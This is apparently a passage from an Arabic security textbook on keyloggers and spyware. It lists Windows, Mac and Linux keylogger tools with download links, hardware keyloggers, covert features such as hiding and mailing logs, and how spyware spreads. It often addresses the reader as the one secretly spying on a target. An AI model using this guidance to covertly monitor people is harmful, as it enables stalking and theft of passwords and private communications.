‫‪ .email/FTP/LAN‬ﻛﻠوﻏر ﯾﻧﺷط ﻧﻔﺳﮫ ﺗﻠﻘﺎﺋﯾﺎ ﻋﻧد ﺑدء ﺗﺷﻐﯾل ‪ Windows‬وﯾﻛون ﻏﯾر ﻣرﺋﻲ ﺗﻣﺎﻣﺎ‪ .‬ﯾﻣﻛﻧك ﻓﻌل اﻷﺷﯾﺎء اﻟﺗﺎﻟﯾﺔ ﺑﺎﺳﺗﺧدام‬
‫ھذا اﻟﺑرﻧﺎﻣﺞ‪:‬‬
‫‪ -1‬اﻟﺗﻘﺎط ﺟﻣﯾﻊ ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ )اﻟﻣﻔﺎﺗﯾﺢ ﻣﺳﺟل(‪.‬‬
‫‪ -2‬ﺗﺳﺟﯾل اﻟرﺳﺎﺋل اﻟﻔورﯾﺔ‪.‬‬
‫‪ -3‬ﻣراﻗﺑﺔ اﺳﺗﺧدام اﻟﺗطﺑﯾﻖ‪.‬‬
‫‪ -4‬اﻟﺗﻘﺎط ﻧﺷﺎط ﺳطﺢ اﻟﻣﻛﺗب‪.‬‬
‫‪ -5‬اﻟﺗﻘﺎط ﺻوره ﻟﺳطﺢ اﻟﻣﻛﺗب )‪.(Capture Screenshot‬‬
‫‪ -6‬اﻟﺑﺣث اﻟﺳرﯾﻊ ﻓﻲ ﻣﻠﻔﺎت اﻟﺳﺟل‪.‬‬
‫‪ -7‬إرﺳﺎل اﻟﺗﻘﺎرﯾر ﻋﺑر اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ‪ ،FTP ،‬واﻟﺷﺑﻛﺔ‪.‬‬
‫‪ -8‬ﺗﺳﺟﯾل أﺻوات اﻟﻣﯾﻛروﻓون‪.‬‬
‫‪ -9‬إﻧﺷﺎء ﺗﻘﺎرﯾر ‪.HTML‬‬
‫‪ -10‬ﺗﻌطﯾل ‪.anti Keyloggers‬‬
‫‪ -11‬ﺗﻌطﯾل اﻟﺑراﻣﺞ اﻟﻐﯾر ﻣرﻏوب ﻓﯾﮭﺎ‪.‬‬
‫‪ -12‬ﻓﻠﺗرة رﺻد ﺣﺳﺎﺑﺎت اﻟﻣﺳﺗﺧدﻣﯾن‪.‬‬
‫‪ -13‬إرﺳﺎل ﺗﻘﺎرﯾر ‪.FTP‬‬
‫‪ -14‬إرﺳﺎل ﺗﻘﺎرﯾر ﺑﺗﻧﺳﯾﻖ ‪.HTML‬‬
‫‪ -15‬ﻣﻧﻊ ﻋﻧﺎوﯾن اﻟﻣواﻗﻊ اﻟﻐﯾر ﻣرﻏوب ﻓﯾﮭﺎ‪.‬‬
‫‪ -16‬وﻗف ﺗﺳﺟﯾل ﻋﻧدﻣﺎ ﯾﻛون اﻟﻛﻣﺑﯾوﺗر ﺧﺎﻣﻼ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


411

Keyloggers for Windows


‫ ھﻧﺎك اﻟﻛﺛﯾر ﻣن ﺑرﻣﺟﯾﺎت ﻛﻠوﻏر اﻟﻣﺗﺎﺣﺔ ﻓﻲ اﻟﺳوق؛ ﯾﻣﻛﻧك اﻻﺳﺗﻔﺎدة ﻣن ھذه اﻷدوات ﻟﺗﺳﺟﯾل ﺿرﺑﺎت‬،‫إﻟﻰ ﺟﺎﻧب ﺷرح ﻛﻠوﻏر ﺳﺎﺑﻘﺎ‬
‫ ﯾﺗم اﺳﺗﺧداﻣﮭﺎ ﻟﺗﺳﺟﯾل ﺟﻣﯾﻊ ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ‬.‫ ﯾﺗم ﺳرد ھذه ﻛﻠوﻏر ﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ‬.‫ ورﺻد ﻛل ﻧﺷﺎط اﻟﻣﺳﺗﺧدم ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر‬،‫اﻟﻣﻔﺎﺗﯾﺢ‬
‫ ﯾﻣﻛﻧك ﺗﺣﻣﯾل ھذه اﻷدوات ﻣن اﻟﻣواﻗﻊ اﻟﺧﺎﺻﺔ ﺑﮭم ﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ واﻟﺑدء ﻓﻲ اﺳﺗﺧداﻣﮭﺎ ﻟﻣراﻗﺑﺔ ﺿرﺑﺎت‬.‫ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر اﻟﻣﺳﺗﺧدم‬
.‫اﻟﻣﻔﺎﺗﯾﺢ وﻏﯾرھﺎ ﻣن ﻧﺷﺎط اﻟﻣﺳﺗﺧدم ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر‬
:‫ﺳﺗﺟد ھﻧﺎ ﻻﺋﺣﺔ ﻛﻠوﻏر اﻟﺗﻲ ﺗﻌﻣل ﻋﻠﻰ ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز‬
Ultimate Keylogger available at http://ultimatekeylogger.com/
Advanced Keylogger available at http://www.mykeylogger.com
The Best Keylogger available at http://www.thebestkeylogger.com
SoftActivity Keylogger available at http://www.softactivity.com
Elite Keylogger available at http://www.widestep.com
Powered Keylogger available at http://www.mykeylogger.com
StaffCop Standard available at http://www.staffcop.com
iMonitorPC available at http://www.imonitorgc.com
PC Activity Monitor Standard available at http://www.pcacme.com
KeyProwler available at http://www.keyprowler.com/
Keylogger Spy Monitor available at http://ematrixsoft.com
REFOG Personal Monitor available at http://www.refog.com
Actual Keylogger available at http://www.actualkeylogger.com
Spytector available at http://www.spytector.com/
KidLogger available at http://kidlogger.net
PC Spy Keylogger available at http://www.pc-spy-keylogger.com
Revealer Keylogger available at http://www.logixoft.com
Spy Keylogger available at http://www.spy-key-logger.com
SpyBuddy® 2012 available at http://www.exploreanywhere.com

Keylogger for MAC: Amac Keylogger for MAC


http://www.amackeylogger.com :‫اﻟﻣﺻدر‬
.‫ ھو ﻛﻠوﺟر ﯾﻌﻣل ﻋﻠﻰ أﻧظﻣﺔ اﻟﺗﺷﻐﯾل ﻣﺎك وﯾﺳﻣﺢ ﻟك ﺑﺎﻟﺗﺟﺳس ﻋﻠﻰ ﺟﮭﺎز ﻣﺎك ﻟﻠﺗﺳﺟﯾل ﺳرا ﻛل ﺷﻲء ﻋﻠﻰ ﻣﺎك‬Amac Keylogger
:‫وﯾﻔﻌل اﻷﺷﯾﺎء اﻟﺗﺎﻟﯾﺔ‬
.‫ ﺗﺳﺟﯾل ﻛﻠﻣﺎت اﻟﻣرور اﻟﺗﻲ ﺗﻣت ﻛﺗﺎﺑﺗﮭﺎ‬-
.‫ ﺗﺳﺟﯾل ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ وﻣﺣﺎدﺛﺎت اﻟدردﺷﺔ‬-
.‫ ﺗﺳﺟل اﻟﻣواﻗﻊ وأﺧذ ﻟﻘطﺎت‬-
.‫ ﻟﻠﻣراﻗﺑﺔ ﻣﺎﻛﻧﺗوش‬IP ‫ ﺗﺳﺟﯾل ﻋﻧوان‬-
.‫ ﺗﺷﻐل ﺗﻠﻘﺎﺋﯾﺎ ﺳرا ﻋﻧد ﺑدء اﻟﺗﺷﻐﯾل‬-
.‫ ﺗطﺑﯾﻖ اﻹﻋدادات ﻋﻠﻰ ﻛﺎﻓﺔ اﻟﻣﺳﺗﺧدﻣﯾن ﻣﻊ ﺿﻐطﺔ واﺣدة‬-
.‫ ﻋﻠﻰ ﻓﺗرات ﻣﺣددة ﻣﺳﺑﻘﺎ‬email/FTP ‫ إرﺳﺎل اﻟﺳﺟﻼت إﻟﻰ‬-
.‫ ﺣﻣﺎﯾﺔ ﻛﻠﻣﺔ ﺳر اﻟوﺻول إﻟﻰ ﻛﻠوﻏر‬-

https://www.facebook.com/tibea2004 ‫ ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬.‫د‬


412

Keyloggers for MAC


‫ وھذه اﻷدوات‬. Mac‫ ھﻧﺎك أﯾﺿﺎ اﻟﻌدﯾد ﻣن ﻛﻠوﻏر اﻟذي ﯾﻌﻣل ﻋﻠﻰ ﻧظﺎم اﻟﺗﺷﻐﯾل‬،‫ﻣﺛل ﺗطﺑﯾﻘﺎت ﻛﻠوﻏر اﻟﻣﺧﺻﺻﺔ ﻟﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز‬
‫ ﯾﻣﻛﻧك ﺗﺣﻣﯾﻠﮭﺎ ﻣن اﻟﻣواﻗﻊ اﻟﺧﺎﺻﺔ‬. MAC OS‫ ورﺻد ﻧﺷﺎط اﻟﻣﺳﺗﺧدم ﻋﻠﻰ ﻧظﺎم اﻟﻛﻣﺑﯾوﺗر اﻟﮭدف‬،‫ﺗﺳﺎﻋدك ﻋﻠﻰ ﺗﺳﺟﯾل ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ‬
‫ أﻧﮭﺎ ﺗﻣﻛﻧك ﻣن ﺗﺳﺟﯾل ﻛل ﺷﻲء ﯾﻔﻌﻠﮫ اﻟﻣﺳﺗﺧدم ﻋﻠﻰ‬.‫ ﯾﻣﻛﻧك أن ﺗﺳﺗﺧدﻣﮭﺎ ﻟﻠﺗﺟﺳس ﻋﻠﻰ ﺟﮭﺎز ﻣﺎك ﻟﺗﺳﺟﯾل ﺳرا ﻛل ﺷﻲء ﻋﻠﻰ ﻣﺎك‬،‫ﺑﮭم‬
‫ اﻟﺦ‬،‫ وأﺧذ ﻟﻘطﺎت ﻣن ﻛل ﻧﺷﺎط‬،‫ اﻟدردﺷﺔ واﻟرﺳﺎﺋل‬،‫ وﺗﺳﺟﯾل اﻻﺗﺻﺎل ﻋﺑر اﻟﺑرﯾد اﻻﻟﻛﺗروﻧﻲ‬،‫اﻟﻛﻣﺑﯾوﺗر ﻣﺛل ﺗﺳﺟﯾل ﺿرﺑﺔ اﻟﻣﻔﺗﺎح‬
:Mac OS ‫ﯾﻣﻛﻧك اﺳﺗﺧدام ﻛﻠوﻏر اﻟﺗﺎﻟﯾﺔ ﻟﻧظﺎم اﻟﺗﺷﻐﯾل‬
Aobo Mac OS X KeyLogger available at http://www.keylogger-mac.com
Perfect Keylogger for Mac available at http://www.blazingtools.com
Award Keylogger for Mac available at http://www.award-soft.com
Mac Keylogger available at http://www.award-soft.com
REFOG Keylogger for MAC available at http://www.refog.com
KidLogger for MAC available at http://kidlogger.net
MAC Log Manager available at http://www.keylogger.in
Logkext available at https://code.google.com
Keyboard Spy available at http://alphaomega.software.free.fr
FreeMacKeylogger available at http://www.hwsuite.com

List of Linux Key Loggers


LKL -1

http://kaz.dl.sourceforge.net/project/lkl/lkl-0.1.1/lkl-0.1.1/lkl-0.1.1.tar.gz :‫اﻟﻣﺻدر‬
‫ ﯾﺗﺟﺳس وﯾﻘوم ﺑﺗﺳﺟل ﻛل ﺷﻲء ﯾﻣر ﻣن ﺧﻼل ﻣﻧﻔذ ﻟوﺣﺔ‬LKL .linux--x86/arch ‫ ھو ﻛﻠوﻏر ﯾﻌﻣل ﻓﻲ ﺑﯾﺋﺔ اﻟﻣﺳﺗﺧدم ﺗﺣت‬LKL
.‫اﻟﻣﻔﺎﺗﯾﺢ اﻷﺟﮭزة‬
Log Key -2
http://logkeys.googlecode.com/files/logkeys-0.1.1a.tar.gz :‫اﻟﻣﺻدر‬

https://www.facebook.com/tibea2004 ‫ ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬.‫د‬


‫‪413‬‬

‫‪ Log keys‬ھو ﻛﻠوﻏر ﻣﺧﺻص ﻟﻠﯾﻧﻛس‪ .‬ﻓﺈﻧﮫ ﻟﯾس أﻛﺛر ﺗﻘدﻣﺎ ﻣن ﻏﯾرھﺎ ﻣن ﻛﻠوﻏر ﻟﯾﻧﻛس اﻟﻣﺗﺎﺣﺔ‪ ،‬ﻻ ﺳﯾﻣﺎ ‪ LKL‬و‪ ،uberkey‬وﻟﻛن ھو‬
‫أﺣدث ﻗﻠﯾﻼ‪ ،‬وأﻛﺛر ﻣﺎ ﯾﺻل إﻟﻰ ﺗﺎرﯾﺦ‪.‬‬
‫‪Ttypld -3‬‬

‫اﻟﻣﺻدر‪http://kaz.dl.sourceforge.net/project/ttyrpld/ttyrpld/2.60/ttyrpld-2.60.tar.bz2 :‬‬
‫‪ Ttyrpld‬ﯾﺳﺗﺧدم ﻟﺗﺳﺟﯾل أي ﺣرﻛﺔ ﻣرور واﻹﺟراءات اﻟﺗﻲ ﺗذھب ﻣن ﺧﻼل أي ﻣن أﺟﮭزة ‪ TTY‬ﻧواة اﻟﺧﺎص ﺑك‪.‬‬
‫‪uber key -4‬‬

‫اﻟﻣﺻدر‪ftp://ftp.nz.debian.org/freebsd/ports/distfiles/uberkey-1.2.tar.gz :‬‬
‫‪Vlogger -5‬‬

‫اﻟﻣﺻدر‪http://www.thc.org/releases/vlogger-2.1.1.tar.gz :‬‬
‫‪Simple Keylogger Python script -6‬‬

‫اﻟﻣﺻدر‪http://kaz.dl.sourceforge.net/project/linuxkeylogger/keylogger.py:‬‬

‫ﻟﻣزﯾد ﻣن اﻟﻣﻌﻠوﻣﺎت ﻋن طرﯾﻘﺔ ﻋﻣل اﻟﻛﯾﻠوﺟرز ﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل ﻟﯾﻧﻛس ﯾﻣﻛﻧك زﯾﺎرة اﻟراﺑط اﻟﺗﺎﻟﻲ‬
‫‪https://www.thc.org/papers/writing-linux-kernel-keylogger.txt‬‬

‫‪Hardware Keyloggers‬‬
‫‪ Hardware Keylogger‬ھو ﻋﺑﺎره ﻋن أﺟﮭزه ﯾﺗم ﺗوﺻﯾﻠﮭﺎ ﺑﯾن ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ واﻟﻛﻣﺑﯾوﺗر‪ .‬ﯾﺗم اﺳﺗﺧداﻣﮫ ﻟﺗﺳﺟﯾل ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ ﻋﻠﻰ‬
‫اﻟﻛﻣﺑﯾوﺗر اﻟﻣﺳﺗﺧدم اﻟﮭدف‪ Hardware Keylogger .‬ﺗﺳﺟﯾل ﺟﻣﯾﻊ ﻧﺷﺎطﺎت ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ إﻟﻰ ذاﻛرة اﻟداﺧﻠﯾﺔ‪ .‬ﻣﯾزة ‪Hardware‬‬
‫‪ Keylogger‬ﻋﻠﻰ ﺗطﺑﯾﻘﺎت ﻛﻠوﻏر ھو إﻣﻛﺎﻧﯾﺔ ﺗﺳﺟﯾﻠﮭﺎ ﺿﻐطﺎت اﻟﻣﻔﺎﺗﯾﺢ ﻓﻲ أﻗرب وﻗت ﻣﻣﻛن ﺑدء ﺗﺷﻐﯾل اﻟﻛﻣﺑﯾوﺗر‪ .‬ﯾﻣﻛﻧك اﺳﺗﺧدام‬
‫‪ Hardware Keylogger‬اﻷﺗﯾﺔ ﻟﺗﺣﻘﯾﻖ أھداﻓك‪.‬‬
‫‪KeyGhost‬‬

‫اﻟﻣﺻدر‪http://www.keyghost.com :‬‬

‫‪Keyghost‬ھو ﺟﮭﺎز ذات اﻟﻣﻛوﻧﺎت اﻟﺻﻐﯾرة )‪ (tiny plug-in device‬واﻟذى ﯾﻘوم ﺑﺗﺳﺟل ﻛل ﺿﻐطﺔ ﺗﻣت ﻛﺗﺑﺗﮭﺎ ﻋﻠﻰ أي ﺟﮭﺎز‬
‫ﻛﻣﺑﯾوﺗر‪ .‬ﯾﻣﻛﻧك أﯾﺿﺎ رﺻد وﺗﺳﺟﯾل اﻻﺗﺻﺎل ﻋﺑر اﻟﺑرﯾد اﻻﻟﻛﺗروﻧﻲ‪ ،‬وﻧﺷﺎط ﻏرف اﻟدردﺷﺔ‪ ،‬واﻟرﺳﺎﺋل اﻟﻔورﯾﺔ‪ ،‬وﻋﻧﺎوﯾن ﻣواﻗﻊ اﻟوﯾب‪،‬‬
‫اﻟﺑﺣث ﻓﻲ ﻣﺣرﻛﺎت اﻟﺑﺣث‪ ،‬وأﻛﺛر ﻣن ذﻟك‪ .‬ﻻ ﺗﺣﺗﺎج ﻟﺗﺛﺑﯾت أي ﻣن اﻟﺑراﻣﺞ ﻟﺗﺳﺟﯾل ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ أو اﺳﺗرداد‪.‬‬
‫اﻟﻣﯾزات‪:‬‬
‫‪ -‬ﺳﮭل ﻓﻲ اﻻﺳﺗﺧدام‬
‫‪ -‬ﯾﺗم ﺗﺛﺑﯾﺗﮫ ﻓﻲ ﺛوان؛ ﺑﻣﺟرد ﺗوﺻﯾﻠﮫ‪.‬‬
‫‪ -‬ﯾﻣﻛن اﺳﺗﺧراﺟﮫ ﻣن ﺟﺎھز )‪ (unplugged‬وﺗوﺻﯾﻠﮫ ﺑﺟﮭﺎز اﺧر ﻻﺳﺗرﺟﺎع اﻟﻣﻌﻠوﻣﺎت ﻋﻠﻰ ﻛﻣﺑﯾوﺗر آﺧر‪.‬‬
‫‪ -‬ﻻ ﯾﺳﺗﺧدم أي ﻣن ﻣوارد اﻟﻧظﺎم‪.‬‬
‫‪ -‬ﻣﻣﺗﺎز ﻓﻲ اﻟﻧﺳﺦ اﻻﺣﺗﯾﺎطﻲ‪.‬‬

‫‪KeyGrabber‬‬

‫اﻟﻣﺻدر‪http://www.keydemon.com :‬‬

‫‪ KeyGrabber‬ھو ﺟﮭﺎز ﯾﺳﻣﺢ ﻟك ﺑﺗﺳﺟﯾل ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ ﻣن ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ ﺳواء ‪ PS/2‬أو ‪ .USB‬أﺟﮭزة ﺗﺳﺟﯾل اﻟﻔﯾدﯾو ھو ﺻﻐﯾرة‬
‫اﻹطﺎر ﻻﻟﺗﻘﺎط ﻟﻘطﺎت ﻣن ‪ HDMI ،DVI ،VGA‬أو ﻣﺻدر اﻟﻔﯾدﯾو‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪414‬‬

‫‪Spyware‬‬

‫اﻟﺗﺟﺳس )‪(Spyware‬ھو ﺑرﻧﺎﻣﺞ ﻟﻣراﻗﺑﺔ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر ﻣﺗﺧﻔﯾﺎ واﻟﺗﻲ ﺗﺳﻣﺢ ﻟك ﺑﺗﺳﺟﯾل ﺟﻣﯾﻊ اﻷﻧﺷطﺔ اﻟﺗﻲ ﯾﻘوم ﺑﮭﺎ ﻣﺳﺗﺧدم اﻟﻛﻣﺑﯾوﺗر‬
‫ﺳرا‪ .‬ﺣﯾث أﻧﮫ ﺗﻠﻘﺎﺋﯾﺎ ﯾﺳﻠم ﻣﻠﻔﺎت اﻟﺳﺟل ﻋﺑر اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ أو ﺑروﺗوﻛول ﻧﻘل اﻟﻣﻠﻔﺎت‪ ،‬واﻟﺗﻲ ﺗﺷﻣل ﺟﻣﯾﻊ ﻣﺟﺎﻻت اﻟﻧظﺎم ﻣﺛل إرﺳﺎل‬
‫اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ‪ ،‬اﻟﻣواﻗﻊ اﻟﺗﻲ ﺗﻣت زﯾﺎرﺗﮭﺎ‪ ،‬ﻛل ﺿﻐطﺔ ﻣﻔﺎﺗﯾﺢ )ﺑﻣﺎ ﻓﻲ ذﻟك ﺗﺳﺟﯾل اﻟدﺧول‪/‬ﻛﻠﻣﺔ ﻣرور‪،AIM ،AOL ،MSN ، ICQ‬‬
‫و ‪ Yahoo Messenger‬أو‪ ، (Webmail‬ﻣﻠف اﻟﻌﻣﻠﯾﺎت‪ ،‬وﻣﺣﺎدﺛﺎت اﻟدردﺷﺔ ﻋﻠﻰ اﻻﻧﺗرﻧت‪ .‬ﻓﺈﻧﮫ ﯾﺄﺧذ أﯾﺿﺎ ﻟﻘطﺎت ﻋﻠﻰ ﻓﺗرات ﻣﺣددة‪،‬‬
‫ﻣﺛل ﻛﺎﻣﯾرا اﻟﻣراﻗﺑﺔ اﻟﻣﺗﺻﻠﺔ ﻣﺑﺎﺷرة ﺑﺷﺎﺷﺔ اﻟﻛﻣﺑﯾوﺗر‪ .‬ﻋﺎدة ﻣﺎ ﯾﻛون ‪ Spyware‬ﻣﻛون ﻣﺧﻔﻲ ﻓﻲ اﻟﺑراﻣﺞ اﻟﻣﺟﺎﻧﯾﺔ أو اﻟﺑراﻣﺞ اﻟﻐﯾر ﻣﺟﺎﻧﯾﺔ‬
‫واﻟﺗﻲ ﯾﻣﻛن ﺗﺣﻣﯾﻠﮭﺎ ﻣن اﻹﻧﺗرﻧت‪.‬‬

‫‪ Spyware Propagation‬اﻧﺗﺷﺎر ﺑراﻣﺞ اﻟﺗﺟﺳس‬


‫ﺗﺛﺑﯾت ﺑراﻣﺞ اﻟﺗﺟﺳس ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑﺎﻟﻣﺳﺗﺧدم ﻻ ﯾﺗطﻠب أي ﻣواﻓﻘﺔ ﻣن اﻟﻣﺳﺗﺧدم‪ .‬ﯾﻣﻛﻧك ﺗﺛﺑﯾت ﺑراﻣﺞ اﻟﺗﺟﺳس‬
‫ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑﺎﻟﻣﺳﺗﺧدم دون ﻋﻠﻣﮭم ﻣن ﺧﻼل ﺣﻣل " ‪ " piggybacking‬ﺑراﻣﺞ اﻟﺗﺟﺳس ﻋﻠﻰ ﺑراﻣﺞ أﺧرى‪ ،‬وھذا ﻣﻣﻛن‬
‫ﻷن ﺑراﻣﺞ اﻟﺗﺟﺳس ﯾﺳﺗﺧدم ﻣﻠﻔﺎت ﺗﻌرﯾف اﻻرﺗﺑﺎط اﻹﻋﻼﻧﯾﺔ)‪ ، (advertising cookies‬واﻟﺗﻲ ھﻲ واﺣدة ﻣن اﻟﻔﺋﺎت اﻟﻔرﻋﯾﺔ ﻟﺑراﻣﺞ‬
‫اﻟﺗﺟﺳس‪ ،‬وﯾﻣﻛﻧك أﯾﺿﺎ أن ﺗﺗﺄﺛر‪/‬ﺗﻌدى ﺑﺑراﻣﺞ اﻟﺗﺟﺳس ﻋﻧد زﯾﺎرة ﻣوﻗﻊ ﻋﻠﻰ ﺷﺑﻛﺔ اﻻﻧﺗرﻧت اﻟذي ﯾوزع ﺑراﻣﺞ اﻟﺗﺟﺳس‪ .‬وھذا ﻣﺎ ﯾﺳﻣﻰ ﻓﻲ‬
‫ﺑﻌض اﻷﺣﯾﺎن "‪ " drive-by downloading‬ﻷﻧﮫ ﯾﺛﺑت ﻧﻔﺳﮫ ﻋﻧد اﻟﻘﯾﺎم ﺑزﯾﺎرة اﻟﻣوﻗﻊ اﻹﻟﻛﺗروﻧﻲ‪.‬‬

‫ﺑﺳﺑب ﻋدم وﺟود اھﺗﻣﺎم ﺑﺎﻟﻧﺳﺑﺔ ﻟﻠﻣﺳﺗﺧدم ﻋﻧد ﺗﺣﻣﯾل وﺗﺛﺑﯾت اﻟﺗطﺑﯾﻘﺎت ﻣن اﻹﻧﺗرﻧت‪ ،‬ﻓﺄﻧﮫ ﯾﻌطﻰ إﻣﻛﺎﻧﯾﺔ ﺗﺛﺑﯾت ﺑراﻣﺞ اﻟﺗﺟﺳس‪ .‬ﯾﺗم دﻓﻊ‬
‫ﺑراﻣﺞ اﻟﺗﺟﺳس ﻣن ﺧﻼل ﺑراﻣﺞ أﺧرى ﻋﻠﻰ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت ﻣﺛل ﺑراﻣﺞ ﻣﻛﺎﻓﺣﺔ اﻟﺗﺟﺳس وﺗﺷﻐﯾﻠﮭﺎ ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑﺎﻟﻣﺳﺗﺧدم‬
‫دون أي إﺷﻌﺎر‪ ،‬ﻋﻧدﻣﺎ ﯾﻘوم اﻟﻣﺳﺗﺧدم ﺑﺗﺣﻣﯾل وﺗﺛﺑﯾت اﻟﺑراﻣﺞ اﻟﺗﻲ ﺗﺣﺗوي ﻋﻠﻰ ﺑراﻣﺞ اﻟﺗﺟﺳس‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪415‬‬

‫ﻣﺎ اﻟذي ﯾﻣﻛن أن ﯾﻔﻌﻠﮫ ﺑراﻣﺞ اﻟﺗﺟﺳس ‪What Does the Spyware Do‬؟‬
‫ﺑﻣﺟرد ﻧﺟﺎح ﺗﺛﺑﯾت ﺑراﻣﺞ اﻟﺗﺟﺳس ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺿﺣﯾﺔ‪ ،‬ﯾﻣﻛﻧك أن ﺗﻔﻌل أﺷﯾﺎء ﻛﺛﯾرة ﻣﺳﯾﺋﺔ ﻟﻠﻛﻣﺑﯾوﺗر اﻟﺿﺣﯾﺔ‪ .‬ﯾﻣﻛﻧك اﻟﻘﯾﺎم ﺑﺎﻟﻌدﯾد‬
‫ﻣن اﻻﻣور اﻟﺗﺎﻟﯾﺔ ﻣﻊ ﺑراﻣﺞ اﻟﺗﺟﺳس اﻟﻣﺛﺑﺗﺔ ﻋﻠﻰ ﺟﮭﺎز ﻛﻣﺑﯾوﺗر اﻟﺿﺣﯾﺔ‪:‬‬

‫ﺳرﻗﺔ ﻣﻌﻠوﻣﺎت اﻟﻣﺳﺗﺧدﻣﯾن اﻟﺷﺧﺻﯾﺔ وإرﺳﺎﻟﮭﺎ إﻟﻰ ﻣﻠﻘم ﺑﻌﯾد أو ‪.hijacker‬‬ ‫‪-‬‬
‫ﻣراﻗﺑﺔ ﻧﺷﺎط اﻟﻣﺳﺗﺧدﻣﯾن ﻋﻠﻰ اﻻﻧﺗرﻧت‪.‬‬ ‫‪-‬‬
‫ﻋرض اﻟﻧواﻓذ اﻟﻣﻧﺑﺛﻘﺔ اﻟﻣزﻋﺟﺔ وإﻋﺎدة ﺗوﺟﯾﮫ ﻣﺗﺻﻔﺢ اﻹﻧﺗرﻧت ﻟﻣواﻗﻊ اﻹﻋﻼﻧﺎت‪.‬‬ ‫‪-‬‬
‫ﺗﻐﯾﯾر اﻹﻋداد اﻻﻓﺗراﺿﻲ ﻟﻣﺗﺻﻔﺢ اﻟوﯾب وﻣﻧﻊ اﻟﻣﺳﺗﺧدم ﻣن اﺳﺗﻌﺎدﺗﮫ‪.‬‬ ‫‪-‬‬
‫إﺿﺎﻓﺔ اﻟﻌﻼﻣﺎت اﻟﻣﺗﻌددة إﻟﻰ اﻟﻘﺎﺋﻣﺔ اﻟﻣﻔﺿﻠﺔ ﻓﻲ ﻣﺗﺻﻔﺢ اﻹﻧﺗرﻧت‬ ‫‪-‬‬
‫ﺧﻔض ﻣﺳﺗوى اﻷﻣن اﻟﻌﺎم ﻟﻠﻧظﺎم‪.‬‬ ‫‪-‬‬
‫وﺿﻊ اﺧﺗﺻﺎرات ﺳطﺢ اﻟﻣﻛﺗب إﻟﻰ ﻣواﻗﻊ اﻟﺗﺟﺳس اﻟﺧﺑﯾﺛﺔ‪.‬‬ ‫‪-‬‬
‫اﻻﺗﺻﺎل ﺑﺎﻟﻣواﻗﻊ اﻹﺑﺎﺣﯾﺔ ﻋن ﺑﻌد‪.‬‬ ‫‪-‬‬
‫ﺗﺧﻔﯾض أداء اﻟﻧظﺎم وﯾﺳﺑب أﯾﺿﺎ ﻋدم اﺳﺗﻘرار اﻟﺑرﻣﺟﯾﺎت‪.‬‬ ‫‪-‬‬
‫ﺳرﻗﺔ ﻛﻠﻣﺎت اﻟﺳر اﻟﺧﺎﺻﺔ ﺑك‪.‬‬ ‫‪-‬‬
‫ارﺳﺎل ﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ﻣﺳﺗﮭدف‪.‬‬ ‫‪-‬‬
‫ﺗﻌدﯾل اﻟﻣﻠﻔﺎت ‪ (dll) dynamically linked libraries‬وﺗﺑطﺊ اﻟﻣﺗﺻﻔﺢ‪.‬‬ ‫‪-‬‬
‫ﺗﻐﯾﯾر إﻋدادات ﺟدار اﻟﺣﻣﺎﯾﺔ‪.‬‬ ‫‪-‬‬
